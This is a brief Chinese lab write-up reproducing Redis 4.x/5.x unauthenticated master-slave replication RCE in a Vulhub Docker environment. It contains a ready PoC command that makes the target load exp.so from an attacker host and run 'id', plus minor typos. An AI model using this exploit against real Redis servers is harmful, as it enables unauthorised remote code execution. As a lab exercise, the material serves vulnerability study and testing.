5.x 主从复制导致的命令执行

Redis 4.x/5.x 主从复制导致的命令执行

Redis是著名的开源Key-Value数据库，其具备再沙箱中执行Lua脚本的能力。

Redis未授权访问在4.x/5.0.5以前版本下，我们可以使用master/slave模式加载远程模块，通过动态链接库的方式执行任意目录。

环境搭建

cd vulhub/redis/4-unacc
docker0compose up -d

环境启动后，通过redis-cli -h 10.10.10.8即可进行连接，可见存在未授权访问漏洞。

漏洞复现

使用POC
python3 redis-master.py -r 10.10.10.8 -p 6379 -L 10.10.10.1 -P 8888 -f RedisModulesSDK/exp.so -c "id"